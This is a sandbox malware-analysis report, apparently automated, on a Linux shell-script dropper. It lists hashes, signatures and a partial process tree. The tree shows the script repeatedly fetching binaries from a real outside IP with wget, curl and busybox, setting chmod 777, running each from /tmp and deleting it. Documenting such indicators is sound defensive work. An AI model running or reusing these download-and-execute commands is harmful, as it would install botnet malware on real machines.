Analysis
-
max time kernel
22s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28/10/2024, 01:07
Static task
static1
Behavioral task
behavioral1
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh
-
Size
10KB
-
MD5
22f4216f3ccd3bd3da6abc07872ed694
-
SHA1
a8a8f0e68a4e021880b294c0ea1a5b5d771b2cfa
-
SHA256
33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4
-
SHA512
5d2853a61c5cd7ab892aa41605cc6b8826c8c2ed15992aa7ba4dabefc73abc788984183ff8c5290401418b5567559486f6dd87e620a151cffa95ea7ffb31d3c3
-
SSDEEP
192:0D8ANuGrOy9GmNLkmCFO3HeVlhz3HeVlh0f8ANuGVOy9GmV:C8ANuGrOy9GmNLkmCFF8ANuGVOy9GmV
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1586 chmod 1676 chmod 1670 chmod 1682 chmod 1532 chmod 1562 chmod 1604 chmod 1664 chmod 1556 chmod 1610 chmod 1526 chmod 1550 chmod 1628 chmod 1646 chmod 1658 chmod 1544 chmod 1592 chmod 1634 chmod 1574 chmod 1598 chmod 1622 chmod 1652 chmod 1640 chmod 1520 chmod 1538 chmod 1568 chmod 1580 chmod 1616 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 1521 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 1527 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 1533 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 1539 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 1545 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 1551 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 1557 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 1563 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 1569 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 1575 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 1581 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 1587 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 1593 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 1599 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD 1605 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d 1611 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF 1617 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 1623 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 1629 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 1635 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 1641 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 1647 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 1653 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 1659 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 1665 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 1671 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 1677 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 1683 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl File opened for modification /tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF curl File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 curl File opened for modification /tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8 curl File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl
Processes
-
/tmp/33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh/tmp/33e01480c1e0a659e4845f594c863cc3994815eceacd26b71e4473884ea94ba4.sh1⤵PID:1512
-
/bin/rm/bin/rm bins.sh2⤵PID:1513
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:1514
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:1519
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:1525
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:1531
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:1537
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:1543
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:1549
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1555
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:1561
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:1563
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:1564
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:1565
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Writes file to tmp directory
PID:1566
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:1567
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:1568
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:1569
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:1570
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:1571
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:1573
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:1575
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:1576
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:1577
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Writes file to tmp directory
PID:1578
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:1579
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:1580
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:1581
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:1582
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:1583
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:1585
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:1587
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:1588
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:1589
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:1591
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:1593
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:1594
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:1595
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Writes file to tmp directory
PID:1596
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:1597
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:1598
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:1599
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:1600
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:1601
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:1603
-
-
/bin/chmodchmod 777 v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD./v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵
- Executes dropped EXE
PID:1605
-
-
/bin/rmrm v8N6H1RCr8Q9GO9NGqx0V43h8BqVAtbDfD2⤵PID:1606
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:1607
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Writes file to tmp directory
PID:1608
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:1609
-
-
/bin/chmodchmod 777 MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- File and Directory Permissions Modification
PID:1610
-
-
/tmp/MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d./MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵
- Executes dropped EXE
PID:1611
-
-
/bin/rmrm MGYPRRFyeGSCeq2nZoIz9oVq7xqEBX7A2d2⤵PID:1612
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:1613
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:1615
-
-
/bin/chmodchmod 777 PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF./PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵
- Executes dropped EXE
PID:1617
-
-
/bin/rmrm PpDMyGc3vl5JiqhrbCM6YN89dU7KIVifqF2⤵PID:1618
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:1619
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:1621
-
-
/bin/chmodchmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵
- Executes dropped EXE
PID:1623
-
-
/bin/rmrm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP2⤵PID:1624
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:1625
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Writes file to tmp directory
PID:1626
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:1627
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:1628
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:1629
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:1630
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:1631
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:1633
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:1635
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:1636
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:1637
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Writes file to tmp directory
PID:1638
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:1639
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:1645
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Writes file to tmp directory
PID:1650
-
-
